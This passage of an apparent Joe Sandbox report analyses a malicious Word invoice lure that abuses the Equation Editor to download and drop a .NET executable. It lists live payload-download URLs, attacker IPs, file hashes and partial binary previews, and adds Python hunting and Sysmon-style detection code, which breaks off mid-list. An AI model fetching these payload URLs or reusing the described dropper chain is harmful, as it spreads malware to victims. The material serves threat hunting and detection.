          https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp | false | - | high
          http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://www.msn.com/?ocid=iehp=0 | explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp | false | - | high
          https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM | explorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmp | false | - | high
          http://www.msn.com/?ocid=iehpLh- | explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp | false | - | high
          Http://www.msn.com/de-de/?ocid=iehp | explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp | false | - | high
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://www.hotmail.com/oe | explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp | false | - | high
          http://treyresearch.net | explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | explorer.exe, 00000006.00000000.492146934.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.425752523.0000000003D90000.00000004.00000001.sdmp | false | - | high
          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmp | false | - | high
          http://java.sun.com | explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.icra.org/vocabulary/. | explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000006.00000000.434104631.0000000001BE0000.00000002.00020000.sdmp | false | - | high
          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmp | false | - | high
          http://investor.msn.com/ | explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp | false | - | high
          http://www.msn.com/de-de/?ocid=iehp | explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp | false | - | high
          http://www.piriform.com/ccleaner | explorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmp | false | - | high
          http://computername/printers/printername/.printer | explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
          http://www.%s.comPA | explorer.exe, 00000006.00000000.434104631.0000000001BE0000.00000002.00020000.sdmp, wininit.exe, 00000007.00000002.668831534.0000000001F00000.00000002.00020000.sdmp | false | URL Reputation: safe | low
          http://www.autoitscript.com/autoit3 | explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmp | false | - | high
          https://support.mozilla.org | explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmp | false | - | high
          http://servername/isapibackend.dll | explorer.exe, 00000006.00000000.436720944.0000000003E50000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

          Contacted IPs

          Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          185.239.243.112 | fantecheo.tk | Moldova Republic of | 55933 | CLOUDIE-AS-APCloudieLimitedHK | true
          34.98.99.30 | lazyguysmarketing.com | United States | 15169 | GOOGLEUS | false

                                                          General Information

                                                          Joe Sandbox Version:33.0.0 White Diamond
                                                          Analysis ID:491373
                                                          Start date:27.09.2021
                                                          Start time:14:24:49
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 11m 16s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:Proforma invoice.doc
                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                           Number of new started processes analysed:10
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.expl.evad.winDOC@9/8@5/2
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 11.6% (good quality ratio 11.3%)
                                                          • Quality average: 74.3%
                                                          • Quality standard deviation: 26.2%
                                                          HCA Information:
                                                          • Successful, ratio: 99%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .doc
                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                          • Attach to Office via COM
                                                          • Scroll down
                                                          • Close Viewer
                                                          Warnings:
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                          • TCP Packets have been reduced to 100
                                                           • Not all processes were analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/491373/sample/Proforma invoice.doc

                                                          Simulations

                                                          Behavior and APIs

          Time | Type | Description
          14:25:16 | API Interceptor | 32x Sleep call for process: EQNEDT32.EXE modified
          14:25:17 | API Interceptor | 69x Sleep call for process: ibefrankhq4862.exe modified
          14:25:39 | API Interceptor | 172x Sleep call for process: wininit.exe modified
          14:26:43 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

          Match: 185.239.243.112

          Associated Sample Name / URL | Detection | Context
          J21021 TUBI PER QUALIFICHE.doc | malicious | xleetaz.xyz/prison/ikk.exe
          RFQ9003930 New Order.doc | malicious | lg-tv.tk/harshmanzx.exe
          WELDED PIPES - Bid No 2000543592- PR.doc | malicious | xleetaz.xyz/prison/sam.exe
          AWB.doc | malicious | fantecheo.tk/famzlogszx.exe
          New Order.doc | malicious | lg-tv.tk/bulizx.exe
          DO526.doc | malicious | fantecheo.tk/famzlogszx.exe
          24-09-2021 LETTER OF INTENT.doc | malicious | lg-tv.tk/bankzx.exe
          DHL#AWB#29721.doc | malicious | fantecheo.tk/princezx.exe
          PO2021.doc | malicious | fantecheo.tk/ibefrankzx.exe
          PON507991 Copy.doc | malicious | lg-tv.tk/bryantzx.exe
          OUTSTANDING PAYMENT.doc | malicious | xleetaz.xyz/benx/nd.exe
          New Order.doc | malicious | xleetaz.xyz/benx/bd.exe
          Proforma Invoice 28093.doc | malicious | xleetaz.xyz/benx/sy.exe
          BL UALBHHOU1.doc | malicious | xleetaz.xyz/benx/mb.exe
          Pedido 20839.doc | malicious | fantecheo.tk/chungzx.exe
          catalogue.doc | malicious | lg-tv.tk/shakitizx.exe
          SWIFT.doc | malicious | lg-tv.tk/obizx.exe
          TU22.doc | malicious | fantecheo.tk/famzlogszx.exe
          AVB CMAU6526450 40HC COI2100105.doc | malicious | lg-tv.tk/bluezx.exe
          Paid Invoices.doc | malicious | lg-tv.tk/atlaszx.exe
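The context column above is worth pivoting on: every related sample that shared 185.239.243.112 fetched its payload from one of three hosts, and on two of them the binary carries the same "zx.exe" suffix. The following is an added example, not part of the Joe Sandbox report: it groups those URLs (copied from the table) by host, derives a conservative path regex per host from the shared directory and filename suffix, and uses the result to test new URLs. Treat the output as hunting leads, not a blocklist: the suffix generalisation is this example's own inference, and nothing in the report proves that every other file on those hosts is malicious.

```python
"""Pivot on Joe Sandbox context data: cluster the payload URLs that related samples
fetched and derive per-host hunting patterns.

Added example, not part of the Joe Sandbox report. CONTEXT_URLS is copied from the
report's "IPs" context table for 185.239.243.112 (scheme-less, as rendered there);
the grouping, the suffix inference and the regexes are this example's own.
"""
import re
from collections import Counter, defaultdict
from typing import Dict, Iterable, List, Tuple

CONTEXT_URLS: List[str] = [
    "xleetaz.xyz/prison/ikk.exe", "lg-tv.tk/harshmanzx.exe", "xleetaz.xyz/prison/sam.exe",
    "fantecheo.tk/famzlogszx.exe", "lg-tv.tk/bulizx.exe", "fantecheo.tk/famzlogszx.exe",
    "lg-tv.tk/bankzx.exe", "fantecheo.tk/princezx.exe", "fantecheo.tk/ibefrankzx.exe",
    "lg-tv.tk/bryantzx.exe", "xleetaz.xyz/benx/nd.exe", "xleetaz.xyz/benx/bd.exe",
    "xleetaz.xyz/benx/sy.exe", "xleetaz.xyz/benx/mb.exe", "fantecheo.tk/chungzx.exe",
    "lg-tv.tk/shakitizx.exe", "lg-tv.tk/obizx.exe", "fantecheo.tk/famzlogszx.exe",
    "lg-tv.tk/bluezx.exe", "lg-tv.tk/atlaszx.exe",
]


def split_url(url: str) -> Tuple[str, str]:
    """Return (host, path) for a URL given with or without a scheme."""
    url = re.sub(r"^[a-z][a-z0-9+.-]*://", "", url, flags=re.I)
    host, _, path = url.partition("/")
    return host.lower(), "/" + path


def group_by_host(urls: Iterable[str]) -> Dict[str, List[str]]:
    groups: Dict[str, List[str]] = defaultdict(list)
    for url in urls:
        host, path = split_url(url)
        groups[host].append(path)
    return dict(groups)


def common_suffix(names: List[str]) -> str:
    """Longest suffix shared by all names ('' if they share nothing)."""
    suffix = names[0]
    for name in names[1:]:
        while not name.endswith(suffix):
            suffix = suffix[1:]
    return suffix


def path_pattern(paths: List[str]) -> str:
    """Regex anchored on the observed directories and the shared filename suffix.

    Deliberately conservative: only directories actually seen are allowed, and the
    filename must end with the suffix common to every observed payload name.
    """
    dirs = sorted({p.rsplit("/", 1)[0] for p in paths})
    names = [p.rsplit("/", 1)[1] for p in paths]
    if len(set(names)) == 1:
        stem = re.escape(names[0])                    # one file seen: match it exactly
    else:
        stem = "[^/]+" + re.escape(common_suffix(names))
    prefix = "^/" if dirs == [""] else "^(?:" + "|".join(re.escape(d) for d in dirs) + ")/"
    return prefix + stem + "$"


def derive_hunt_patterns(urls: Iterable[str]) -> Dict[str, str]:
    """host -> path regex, one per payload host in the context data."""
    return {host: path_pattern(paths) for host, paths in group_by_host(urls).items()}


def matches_campaign(url: str, patterns: Dict[str, str]) -> bool:
    """True if the URL's host is a known payload host and its path fits that host's pattern."""
    host, path = split_url(url)
    pattern = patterns.get(host)
    return bool(pattern and re.match(pattern, path))


def payload_reuse(urls: Iterable[str]) -> Counter:
    """How often each exact payload URL was reused across the related samples."""
    return Counter(host + path for host, path in map(split_url, urls))


if __name__ == "__main__":
    for host, pattern in derive_hunt_patterns(CONTEXT_URLS).items():
        print(f"{host:14} {pattern}")
    for url, count in payload_reuse(CONTEXT_URLS).most_common(3):
        print(f"{count}x {url}")
```

For the report's data this yields `^/[^/]+zx\.exe$` for both fantecheo.tk and lg-tv.tk, a directory-bound `.exe` pattern for xleetaz.xyz, and shows fantecheo.tk/famzlogszx.exe reused by three different lures. The report's own download URL, http://fantecheo.tk/ibefrankzx.exe, matches its host pattern, which is the sanity check to run before feeding such patterns into a proxy-log hunt.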

                                                          Domains

          Match: td-balancer-euw2-6-109.wixdns.net
          All entries detected malicious; context for every entry: 35.246.6.109
          Associated samples: $$$.exe; PAYMENT COPY.exe; RFQ.doc; payment..exe; KOC.exe; CtNh3b5Jo5.exe; DATATRANSFER2021.exe; Renewed Contract with Annex1.xlsx; ryfAIJHmKETyAPz.exe; prueba23.exe; prueba22.exe; triage_dropped_file.exe; pay $.exe; Draft copy.exe; hyfzRJF133.exe; DLT_85620000107.exe; BahcfFNy25bmV1c.exe; DUE INVOICES.exe; PO9887655.exe; Payment Copy.exe

          Match: fantecheo.tk
          All entries detected malicious; context for every entry: 185.239.243.112
          Associated samples: AWB.doc; DO526.doc; DHL#AWB#29721.doc; PO2021.doc; Pedido 20839.doc; TU22.doc; DHLAWB29721.doc; KOC.doc; Overseas Keys inquiry.doc; MT103-6793029471938.doc; NEW INVOICE.doc; Payment reciept.doc; aaaaaa.doc; Qoutation for Strips.doc; KOC 2021.doc; famz13 3.doc; 8765998RQF.doc; Quotation Required PO3652.doc; Shipment Document BL,INV and packing list.doc; DHL-AWD6909800855.doc

                                                          ASN

Match: CLOUDIE-AS-APCloudieLimitedHK

Associated Sample Name / URL | Detection | Context
J21021 TUBI PER QUALIFICHE.doc | malicious | 185.239.243.112
RFQ9003930 New Order.doc | malicious | 185.239.243.112
WELDED PIPES - Bid No 2000543592- PR.doc | malicious | 185.239.243.112
AWB.doc | malicious | 185.239.243.112
New Order.doc | malicious | 185.239.243.112
DO526.doc | malicious | 185.239.243.112
24-09-2021 LETTER OF INTENT.doc | malicious | 185.239.243.112
IKpep4Zn5S.exe | malicious | 45.119.53.93
DHL#AWB#29721.doc | malicious | 185.239.243.112
PO2021.doc | malicious | 185.239.243.112
PON507991 Copy.doc | malicious | 185.239.243.112
OUTSTANDING PAYMENT.doc | malicious | 185.239.243.112
New Order.doc | malicious | 185.239.243.112
Proforma Invoice 28093.doc | malicious | 185.239.243.112
BL UALBHHOU1.doc | malicious | 185.239.243.112
Pedido 20839.doc | malicious | 185.239.243.112
eJRGpI4A6d.exe | malicious | 45.119.53.93
catalogue.doc | malicious | 185.239.243.112
SWIFT.doc | malicious | 185.239.243.112
TU22.doc | malicious | 185.239.243.112

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankzx[1].exe
                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:downloaded
                                                          Size (bytes):863744
                                                          Entropy (8bit):6.787269024335101
                                                          Encrypted:false
                                                          SSDEEP:12288:b3Q2cI8GAKaohwnRZHDA7Mg+SvqwpCR9KDfagVeZ3yYxNEi09I/pRYh7pzWjNhc/:GdIF9YPUu0RPDsu/eE/LQzKhF+va+G
                                                          MD5:7572FBC5DE30359E833D6F382DB286FA
                                                          SHA1:24B8DF7EF119A0282F39A4F8F589DAFC64E1D28C
                                                          SHA-256:1758A9B18032CE82F4E95249413EE1A8CBADE1EF2CB773BC958502801F3AF738
                                                          SHA-512:6F5388CF81CE66DA16F93CB61487F016AE230FBA357C961B36EDAB324DD31A54CD239CA1B74214DA4CD2754AFA686BA10CF82F30339E0712E9173A2EF1ED141E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 13%
                                                          Reputation:low
                                                          IE Cache URL:http://fantecheo.tk/ibefrankzx.exe
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0.............f.... ........@.. ....................................@.....................................O.......T....................`....................................................... ............... ..H............text...l.... ...................... ..`.rsrc...T...........................@..@.reloc.......`.......,..............@..B................H.......H............S............................................................{#...*:.($.....}#...*..0..$........u......,.(%....{#....{#...o&...+..*v ..l. )UU.Z(%....{#...o'...X*...0..M........r...p......%..{#....................-.q.............-.&.+.......o(....()...*..{*...*..{+...*V.($.....}*.....}+...*..0..<........u......,0(%....{*....{*...o&...,.(,....{+....{+...o-...+..*. .pi| )UU.Z(%....{*...o'...X )UU.Z(,....{+...o....X*....0...........r%..p......%..{*...................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{207906E3-995B-4984-95CE-8C9C4EA99CC3}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):3.3009239505533103
                                                          Encrypted:false
                                                          SSDEEP:96:G+Gj8BbEEOCZxJjcMarcJhZ4C4d7g9GyoXcEXuG:G+Gj8C/CZvwMccJhgd7gho/Xf
                                                          MD5:DF19F9BB800EE82E193EF7EA784FC3C8
                                                          SHA1:5E4F036F85194A836272D477B62EE362956F7887
                                                          SHA-256:7F9F3E4E1913990ADB74CD502823C1159F960BD50578F6AFE9BAF559817E4D6A
                                                          SHA-512:5D6F6BF461E0B088BEE6CAAE0F4FB68487C749279CC1F7356DC0456BB5AD6DFB37C92DBEF7CAE342024D6DAD5614272C8968475738F3CA386ECFA89A3F6CC5E3
                                                          Malicious:false
                                                          Preview: `.?.+.^.%.'...'.#.>./.*.#.2.`.].2.+.3.%.6.=.?.3.2...%.8.?.?.,.-.#.6.+.1.].8.%.(.9.9...~.6.4./.!.4.?.|.*.'.#.?.?...).%.8./.6.5.#.$...!.(.[...^.%.~.?.?.^.?.~.,.?.,.%.?.%.@.?./.^.8.0.@.9...(...6.8.4.:.;.<.,.../.7.?.@.%.-.,.].].#...~.).2...2.7...*.<.(.^.1.!._.%.[.).`.1.:.%.,.!.#.[...?.4.<.?.0.>.$.&.*.3.8.5.;.2./.4.'.`.5._.!.?.2.).%.=.<.].[.7.&...).!.%...9.,.7.+.&.`.8.=.|.=.9./.=...'.>.$.?.2.>.1.*.2.[.?.).*.<.`._.-.<.*...^.^...+.3.%.7.`.[.3.<.?.~.].%.!.%...?.1.1.@.;.8.....9.?.[.;./.+.=...>.....~.%.7.8.:.0.8...|.6.+.8.^.4.:.>.8./.(.9.7.5.!.3.&...6.^.?.*.%.(.?.:.@.%.-.%./...+.6.9.+.-.:.&.!.~.?._.|.5.9.^.8.)...@.9...<.%._...?...8.%.$...=.[.2.:.~.%.:...[./.?./.].7.9.-.9.8.?.2.1.!.[._.~.%.&.?...#.).#.!.?.7.,.`.....7.[.?.`.:...(...1.6.6.4.:...?.<.=.%.8.@.~.-.%.=.%.?././.9.$.%.;.*...%.<.<.[.0.5.#.1.;.1.[.,.8.8.].0.?.7./.?.9.?.%.=.>.5...?.0.1.,.2.%.).@.|.1.*.8...4.+.9.6.[.0.&.?.[.*.?.8.).5.1.?.^.:.(.%.7...?.~.?.9.=.+.?.7.2.$.!.-.&.;.=...1.'.!.<.1...6.4.8.:.?.%.$.=.1.3...$.'.(.%...%.?.?.&.%.-.`.3.6.
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D3778CDA-961A-4F4E-A09E-6641E3AF482B}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1024
                                                          Entropy (8bit):0.05390218305374581
                                                          Encrypted:false
                                                          SSDEEP:3:ol3lYdn:4Wn
                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                          Malicious:false
                                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Proforma invoice.LNK
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:54 2021, mtime=Mon Aug 30 20:08:54 2021, atime=Mon Sep 27 20:25:14 2021, length=13744, window=hide
                                                          Category:dropped
                                                          Size (bytes):2088
                                                          Entropy (8bit):4.553828665912094
                                                          Encrypted:false
                                                          SSDEEP:48:8zS/XTA+EfBhwngWf2zS/XTA+EfBhwngWB:8zS/XM5pKngWf2zS/XM5pKngWB
                                                          MD5:B03AE4A9AFDA83073AB38FF9347448F6
                                                          SHA1:E19CEDB159388A7A8544C1B6896AE988279A50ED
                                                          SHA-256:3D9C60CBB7C71F649C0A92C44E761E26AD771E5C0097C33904DE89542819E403
                                                          SHA-512:380A28DBE05DB31FCA1A761132E1F636E4A74FF01B5FBDE8E7DB5A8758CBCA1151017898014358272D1A0ADB077454885AA90788DF5C706985ED63E281FB3A33
                                                          Malicious:false
                                                          Preview: L..................F.... ...\..=...\..=...7..(....5...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S ...Desktop.d......QK.X.S .*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2..5..;S(. .PROFOR~1.DOC..V.......S...S..*.........................P.r.o.f.o.r.m.a. .i.n.v.o.i.c.e...d.o.c.......~...............-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop\Proforma invoice.doc.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.r.o.f.o.r.m.a. .i.n.v.o.i.c.e...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841618..........D_....3N...W...9..g.....
                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):86
                                                          Entropy (8bit):4.3742805190362475
                                                          Encrypted:false
                                                          SSDEEP:3:M1dYMoLZ6ltaQoLZ6lmX1dYMoLZ6lv:MwWa/Gi
                                                          MD5:970EE8C020A44415D691F6A5824634D0
                                                          SHA1:CB66267AAE4C8492460159DA1209E6EEF80E7213
                                                          SHA-256:27FDC724783770E075ED233D852CAAC5E8619A0FDEA23AF1FFECAB42385A61D5
                                                          SHA-512:D09674ACDEAE33413310D7A49F141C769BD42C061FFD143CFAD1DD52090F8BF80AEB5565076815EF5ADDAC8D319844BC119D51959B0D4685F6AA1BF74EF6E1D9
                                                          Malicious:false
                                                          Preview: [doc]..Proforma invoice.LNK=0..Proforma invoice.LNK=0..[doc]..Proforma invoice.LNK=0..
                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):162
                                                          Entropy (8bit):2.5038355507075254
                                                          Encrypted:false
                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                          Malicious:false
                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                          C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):863744
                                                          Entropy (8bit):6.787269024335101
                                                          Encrypted:false
                                                          SSDEEP:12288:b3Q2cI8GAKaohwnRZHDA7Mg+SvqwpCR9KDfagVeZ3yYxNEi09I/pRYh7pzWjNhc/:GdIF9YPUu0RPDsu/eE/LQzKhF+va+G
                                                          MD5:7572FBC5DE30359E833D6F382DB286FA
                                                          SHA1:24B8DF7EF119A0282F39A4F8F589DAFC64E1D28C
                                                          SHA-256:1758A9B18032CE82F4E95249413EE1A8CBADE1EF2CB773BC958502801F3AF738
                                                          SHA-512:6F5388CF81CE66DA16F93CB61487F016AE230FBA357C961B36EDAB324DD31A54CD239CA1B74214DA4CD2754AFA686BA10CF82F30339E0712E9173A2EF1ED141E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 13%
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0.............f.... ........@.. ....................................@.....................................O.......T....................`....................................................... ............... ..H............text...l.... ...................... ..`.rsrc...T...........................@..@.reloc.......`.......,..............@..B................H.......H............S............................................................{#...*:.($.....}#...*..0..$........u......,.(%....{#....{#...o&...+..*v ..l. )UU.Z(%....{#...o'...X*...0..M........r...p......%..{#....................-.q.............-.&.+.......o(....()...*..{*...*..{+...*V.($.....}*.....}+...*..0..<........u......,0(%....{*....{*...o&...,.(,....{+....{+...o-...+..*. .pi| )UU.Z(%....{*...o'...X )UU.Z(,....{+...o....X*....0...........r%..p......%..{*...................
                                                          C:\Users\user\Desktop\~$oforma invoice.doc
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):162
                                                          Entropy (8bit):2.5038355507075254
                                                          Encrypted:false
                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                          Malicious:false
                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
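Two of the entries above are the same PE (identical SHA-256 1758A9B1...AF738): EQNEDT32.EXE, the Equation Editor, first wrote it into the IE cache as the download of http://fantecheo.tk/ibefrankzx.exe and then to C:\Users\user\AppData\Roaming\ibefrankhq4862.exe. The Equation Editor has no business writing executables into a user profile or talking to the network, which is exactly what the EQNEDT32-related signatures of this report key on. As an added example (not the sandbox's own rule logic) the following Python runs three such checks over constructed Sysmon-style events (FileCreate, NetworkConnect, ProcessCreate) modelled on the paths and the address in this report; the events, the extension list and the user-writable path pattern are assumptions for the example, not telemetry from the analysed run.

```python
import re
from pathlib import PureWindowsPath

EQNEDT = "eqnedt32.exe"
# Extensions the Equation Editor should never write. File content is not in the event,
# so the check is by name only (assumption for this example).
EXEC_EXTS = {".exe", ".dll", ".scr", ".com", ".pif", ".cpl"}
# User-writable roots where droppers usually land (assumption for this example).
USER_WRITABLE = re.compile(r"^c:\\users\\[^\\]+\\(appdata|desktop|downloads|documents)\\", re.I)


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of an empty field."""
    return PureWindowsPath(path).name.lower()


def check_event(ev: dict) -> list:
    """Return the names of the rules an event trips (empty list when nothing fires)."""
    hits = []
    eid = ev.get("EventID")
    if eid == 11 and image_name(ev.get("Image", "")) == EQNEDT:            # Sysmon FileCreate
        target = ev.get("TargetFilename", "")
        if PureWindowsPath(target).suffix.lower() in EXEC_EXTS and USER_WRITABLE.match(target):
            hits.append("eqnedt32_drops_executable")
    elif eid == 3 and image_name(ev.get("Image", "")) == EQNEDT:           # Sysmon NetworkConnect
        hits.append("eqnedt32_network_connection")
    elif eid == 1 and image_name(ev.get("ParentImage", "")) == EQNEDT:     # Sysmon ProcessCreate
        hits.append("eqnedt32_spawns_process")
    return hits


def scan_events(events: list) -> list:
    """(EventID, the object the event acted on, rules tripped) for every event that fired a rule."""
    findings = []
    for ev in events:
        hits = check_event(ev)
        if hits:
            subject = ev.get("TargetFilename") or ev.get("DestinationIp") or ev.get("Image")
            findings.append((ev["EventID"], subject, hits))
    return findings


EQN_IMAGE = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"

# Constructed events modelled on this report's dropped-file and network records; not real telemetry.
SAMPLE_EVENTS = [
    # Word writing its own scratch file: benign, must not fire.
    {"EventID": 11, "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files"
                       r"\Content.Word\~WRS{207906E3-995B-4984-95CE-8C9C4EA99CC3}.tmp"},
    # Equation Editor reaching out to the download host seen in the TCP capture.
    {"EventID": 3, "Image": EQN_IMAGE, "DestinationIp": "185.239.243.112", "DestinationPort": 80},
    # Equation Editor writing the fetched PE into the IE cache and then into AppData\Roaming.
    {"EventID": 11, "Image": EQN_IMAGE,
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files"
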